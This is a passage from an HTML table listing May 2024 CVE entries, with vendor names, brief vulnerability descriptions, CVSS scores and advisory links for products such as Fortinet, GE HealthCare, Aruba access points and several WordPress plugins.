<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31856&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31856" target="_blank">CVE-2024-31856</a><br><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-24-123-01" target="_blank">ics-cert@hq.dhs.gov</a><br><a href="https://www.cyberpower.com/global/en/product/sku/powerpanel_business_for_windows#downloads" target="_blank">ics-cert@hq.dhs.gov</a></td>
</tr>
<tr>
<td>CyberPower--PowerPanel business<br> </td>
<td>A specially crafted Zip file containing path traversal characters can be imported to the CyberPower PowerPanel server, which allows file writing to the server outside the intended scope, and could allow an attacker to achieve remote code execution.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33615&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33615" target="_blank">CVE-2024-33615</a><br><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-24-123-01" target="_blank">ics-cert@hq.dhs.gov</a><br><a href="https://www.cyberpower.com/global/en/product/sku/powerpanel_business_for_windows#downloads" target="_blank">ics-cert@hq.dhs.gov</a></td>
</tr>
<tr>
<td>CyberPower--PowerPanel business<br> </td>
<td>The devices which CyberPower PowerPanel manages use identical certificates based on a hard-coded cryptographic key. This can allow an attacker to impersonate any client in the system and send malicious data.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31410&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N" target="_blank" title="CVSS V3 Score">7.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31410" target="_blank">CVE-2024-31410</a><br><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-24-123-01" target="_blank">ics-cert@hq.dhs.gov</a><br><a href="https://www.cyberpower.com/global/en/product/sku/powerpanel_business_for_windows#downloads" target="_blank">ics-cert@hq.dhs.gov</a></td>
</tr>
<tr>
<td>CycloneDX--cyclonedx-javascript-library<br> </td>
<td>The CycloneDX JavaScript library contains the core functionality of OWASP CycloneDX for JavaScript. In 6.7.0, XML External entity injections were possible, when running the provided XML Validator on arbitrary input. This issue was fixed in version 6.7.1.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34345&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34345" target="_blank">CVE-2024-34345</a><br><a href="https://github.com/CycloneDX/cyclonedx-javascript-library/commit/5e5e1e0b9422f47d2de81c7c4064b803a01e7203" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/CycloneDX/cyclonedx-javascript-library/pull/1063" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/CycloneDX/cyclonedx-javascript-library/security/advisories/GHSA-38gf-rh2w-gmj7" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Darren Cooney--Instant Images<br> </td>
<td>Improper Privilege Management vulnerability in Darren Cooney Instant Images allows Privilege Escalation.This issue affects Instant Images: from n/a through 6.1.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33569&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33569" target="_blank">CVE-2024-33569</a><br><a href="https://patchstack.com/database/vulnerability/instant-images/wordpress-instant-images-plugin-6-1-0-arbitrary-option-update-to-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Dell--CPG BIOS<br> </td>
<td>Dell BIOS contains an Improper Input Validation vulnerability. A local authenticated malicious user with admin privileges could potentially exploit this vulnerability, leading to arbitrary code execution.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22429&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22429" target="_blank">CVE-2024-22429</a><br><a href="https://www.dell.com/support/kbdoc/en-us/000221102/dsa-2024-020" target="_blank">security_alert@emc.com</a></td>
</tr>
<tr>
<td>DigiWin--EasyFlow .NET<br> </td>
<td>DigiWin EasyFlow .NET lacks validation for certain input parameters, allowing remote attackers to inject arbitrary SQL commands. This vulnerability enables unauthorized access to read, modify, and delete database records, as well as execute system commands.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4893&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4893" target="_blank">CVE-2024-4893</a><br><a href="https://www.twcert.org.tw/en/cp-139-7801-67d07-2.html" target="_blank">twcert@cert.org.tw</a><br><a href="https://www.twcert.org.tw/tw/cp-132-7800-843f1-1.html" target="_blank">twcert@cert.org.tw</a></td>
</tr>
<tr>
<td>Elementor--Elementor Website Builder<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Elementor Elementor Website Builder allows Manipulating Web Input to File System Calls.This issue affects Elementor Website Builder: from n/a through 3.19.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-24934&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-24934" target="_blank">CVE-2024-24934</a><br><a href="https://patchstack.com/database/vulnerability/elementor/wordpress-elementor-plugin-3-19-0-arbitrary-file-deletion-and-phar-deserialization-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>EnterpriseDB--EDB Postgres Advanced Server<br> </td>
<td>All versions of EnterpriseDB Postgres Advanced Server (EPAS) from 15.0 prior to 15.7.0 and from 16.0 prior to 16.3.0 may allow users using edbldr to bypass role permissions from pg_read_server_files. This could allow low privilege users to read files to which they would not otherwise have access.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4545&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4545" target="_blank">CVE-2024-4545</a><br><a href="https://www.enterprisedb.com/docs/epas/15/epas_rel_notes/" target="_blank">20be33e2-bf35-4d13-8fad-18bd2f3e3659</a><br><a href="https://www.enterprisedb.com/docs/epas/latest/epas_rel_notes/" target="_blank">20be33e2-bf35-4d13-8fad-18bd2f3e3659</a><br><a href="https://www.enterprisedb.com/docs/security/advisories/cve20244545/" target="_blank">20be33e2-bf35-4d13-8fad-18bd2f3e3659</a></td>
</tr>
<tr>
<td>EverPress--Mailster<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in EverPress Mailster allows PHP Local File Inclusion.This issue affects Mailster: from n/a through 4.0.6.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32523&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:L" target="_blank" title="CVSS V3 Score">8.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32523" target="_blank">CVE-2024-32523</a><br><a href="https://patchstack.com/database/vulnerability/mailster/wordpress-mailster-plugin-4-0-6-unauthenticated-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Favethemes--Houzez Login Register<br> </td>
<td>Improper Privilege Management vulnerability in favethemes Houzez Login Register allows Privilege Escalation.This issue affects Houzez Login Register: from n/a through 2.6.3.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-26009&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-26009" target="_blank">CVE-2023-26009</a><br><a href="https://patchstack.com/database/vulnerability/houzez-login-register/wordpress-houzez-login-register-plugin-2-6-3-privilege-escalation?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Favethemes--Houzez<br> </td>
<td>Improper Privilege Management vulnerability in Favethemes Houzez allows Privilege Escalation.This issue affects Houzez: from n/a through 2.7.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-26540&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-26540" target="_blank">CVE-2023-26540</a><br><a href="https://patchstack.com/database/vulnerability/houzez/wordpress-houzez-theme-2-7-1-privilege-escalation?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Fortinet--FortiOS<br> </td>
<td>A stack-based buffer overflow [CWE-121] vulnerability in Fortinet FortiOS version 7.2.1 through 7.2.6 and version 7.4.0 through 7.4.1 allows a privileged attacker over the administrative interface to execute arbitrary code or commands via crafted HTTP or HTTPs requests.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-46714&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-46714" target="_blank">CVE-2023-46714</a><br><a href="https://fortiguard.com/psirt/FG-IR-23-415" target="_blank">psirt@fortinet.com</a></td>
</tr>
<tr>
<td>Fortinet--FortiPortal<br> </td>
<td>A Use Of Less Trusted Source [CWE-348] vulnerability in Fortinet FortiPortal version 7.0.0 through 7.0.6 and version 7.2.0 through 7.2.1 allows an unauthenticated attack to bypass IP protection through crafted HTTP or HTTPS packets.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-23105&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-23105" target="_blank">CVE-2024-23105</a><br><a href="https://fortiguard.com/psirt/FG-IR-24-021" target="_blank">psirt@fortinet.com</a></td>
</tr>
<tr>
<td>Fortinet--FortiSandbox<br> </td>
<td>A client-side enforcement of server-side security in Fortinet FortiSandbox version 4.4.0 through 4.4.4 and 4.2.0 through 4.2.6 allows attacker to execute unauthorized code or commands via HTTP requests.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31491&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31491" target="_blank">CVE-2024-31491</a><br><a href="https://fortiguard.com/psirt/FG-IR-24-054" target="_blank">psirt@fortinet.com</a></td>
</tr>
<tr>
<td>Fortinet--FortiVoice<br> </td>
<td>An authorization bypass through user-controlled key vulnerability [CWE-639] in FortiVoiceEntreprise version 7.0.0 through 7.0.1 and before 6.4.8 allows an authenticated attacker to read the SIP configuration of other users via crafted HTTP or HTTPS requests.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-40720&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L" target="_blank" title="CVSS V3 Score">7.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-40720" target="_blank">CVE-2023-40720</a><br><a href="https://fortiguard.com/psirt/FG-IR-23-282" target="_blank">psirt@fortinet.com</a></td>
</tr>
<tr>
<td>GE HealthCare--EchoPAC Software Only<br> </td>
<td>Weak account password in GE HealthCare EchoPAC products</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27107&amp;vector=CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27107" target="_blank">CVE-2024-27107</a><br><a href="https://securityupdate.gehealthcare.com/" target="_blank">171caf72-b841-4e04-a68e-93493aff2b94</a></td>
</tr>
<tr>
<td>GE HealthCare--EchoPAC Software Only<br> </td>
<td>Elevation of privilege vulnerability in GE HealthCare EchoPAC products</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27110&amp;vector=CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27110" target="_blank">CVE-2024-27110</a><br><a href="https://securityupdate.gehealthcare.com/" target="_blank">171caf72-b841-4e04-a68e-93493aff2b94</a></td>
</tr>
<tr>
<td>GE HealthCare--EchoPAC Software Only<br> </td>
<td>Insufficiently protected credentials in GE HealthCare EchoPAC products</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27109&amp;vector=CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27109" target="_blank">CVE-2024-27109</a><br><a href="https://securityupdate.gehealthcare.com/" target="_blank">171caf72-b841-4e04-a68e-93493aff2b94</a></td>
</tr>
<tr>
<td>GE HealthCare--Venue<br> </td>
<td>OS command injection vulnerabilities in GE HealthCare ultrasound devices</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-1628&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-1628" target="_blank">CVE-2024-1628</a><br><a href="https://securityupdate.gehealthcare.com/" target="_blank">171caf72-b841-4e04-a68e-93493aff2b94</a></td>
</tr>
<tr>
<td>GE HealthCare--Venue<br> </td>
<td>Elevation of privileges via misconfigured access control list in GE HealthCare ultrasound devices</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-1486&amp;vector=CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-1486" target="_blank">CVE-2024-1486</a><br><a href="https://securityupdate.gehealthcare.com/" target="_blank">171caf72-b841-4e04-a68e-93493aff2b94</a></td>
</tr>
<tr>
<td>GE HealthCare--Venue<br> </td>
<td>Path traversal vulnerability in "getAllFolderContents" function of Common Service Desktop, a GE HealthCare ultrasound device component</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-1630&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">7.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-1630" target="_blank">CVE-2024-1630</a><br><a href="https://securityupdate.gehealthcare.com/" target="_blank">171caf72-b841-4e04-a68e-93493aff2b94</a></td>
</tr>
<tr>
<td>Ghost Foundation--Ghost<br> </td>
<td>Insertion of Sensitive Information into Log File vulnerability in Ghost Foundation Ghost.This issue affects Ghost: from n/a through 1.4.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34559&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34559" target="_blank">CVE-2024-34559</a><br><a href="https://patchstack.com/database/vulnerability/ghost/wordpress-ghost-plugin-1-4-0-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>GiveWP--GiveWP<br> </td>
<td>Improper Privilege Management vulnerability in GiveWP allows Privilege Escalation.This issue affects GiveWP: from n/a through 2.33.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-41665&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-41665" target="_blank">CVE-2023-41665</a><br><a href="https://patchstack.com/database/vulnerability/give/wordpress-givewp-plugin-2-33-0-givewp-manager-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Glowlogix--WP Frontend Profile<br> </td>
<td>Improper Privilege Management vulnerability in Glowlogix WP Frontend Profile allows Privilege Escalation.This issue affects WP Frontend Profile: from n/a through 1.3.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-51483&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-51483" target="_blank">CVE-2023-51483</a><br><a href="https://patchstack.com/database/vulnerability/wp-front-end-profile/wordpress-wp-frontend-profile-plugin-1-3-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>HCL Software--Commerce<br> </td>
<td>Security vulnerability in HCL Commerce 9.1.12 and 9.1.13 could allow denial of service, disclosure of user personal data, and performing of unauthorized administrative operations.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-23576&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:L" target="_blank" title="CVSS V3 Score">7.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-23576" target="_blank">CVE-2024-23576</a><br><a href="https://support.hcltechsw.com/csm?id=kb_article&amp;sysparm_article=KB0112907" target="_blank">psirt@hcl.com</a></td>
</tr>
<tr>
<td>Hamid Alinia idehweb--Login with phone number<br> </td>
<td>Improper Privilege Management vulnerability in Hamid Alinia - idehweb Login with phone number allows Privilege Escalation.This issue affects Login with phone number: from n/a through 1.7.16.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32507&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32507" target="_blank">CVE-2024-32507</a><br><a href="https://patchstack.com/database/vulnerability/login-with-phone-number/wordpress-login-with-phone-number-plugin-1-7-16-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>HasThemes--HT Mega<br> </td>
<td>Improper Privilege Management vulnerability in HasThemes HT Mega allows Privilege Escalation.This issue affects HT Mega: from n/a through 2.2.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-37999&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-37999" target="_blank">CVE-2023-37999</a><br><a href="https://patchstack.com/database/vulnerability/ht-mega-for-elementor/wordpress-ht-mega-absolute-addons-for-elementor-plugin-2-2-0-unauthenticated-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>There are buffer overflow vulnerabilities in the underlying CLI service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31466&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31466" target="_blank">CVE-2024-31466</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>There are buffer overflow vulnerabilities in the underlying CLI service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31467&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31467" target="_blank">CVE-2024-31467</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>There are buffer overflow vulnerabilities in the underlying Central Communications service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31468&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31468" target="_blank">CVE-2024-31468</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>There are buffer overflow vulnerabilities in the underlying Central Communications service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31469&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31469" target="_blank">CVE-2024-31469</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>There is a buffer overflow vulnerability in the underlying SAE (Simultaneous Authentication of Equals) service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31470&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31470" target="_blank">CVE-2024-31470</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>There is a command injection vulnerability in the underlying Central Communications service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31471&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31471" target="_blank">CVE-2024-31471</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>There are command injection vulnerabilities in the underlying Soft AP Daemon service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of these vulnerabilities result in the ability to execute arbitrary code as a privileged user on the underlying operating system.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31472&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31472" target="_blank">CVE-2024-31472</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>There is a command injection vulnerability in the underlying deauthentication service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's Access Point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31473&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31473" target="_blank">CVE-2024-31473</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>There is an arbitrary file deletion vulnerability in the CLI service accessed by PAPI (Aruba's Access Point management protocol). Successful exploitation of this vulnerability results in the ability to delete arbitrary files on the underlying operating system, which could lead to the ability to interrupt normal operation and impact the integrity of the affected Access Point</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31474&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" target="_blank" title="CVSS V3 Score">8.2</a></td>
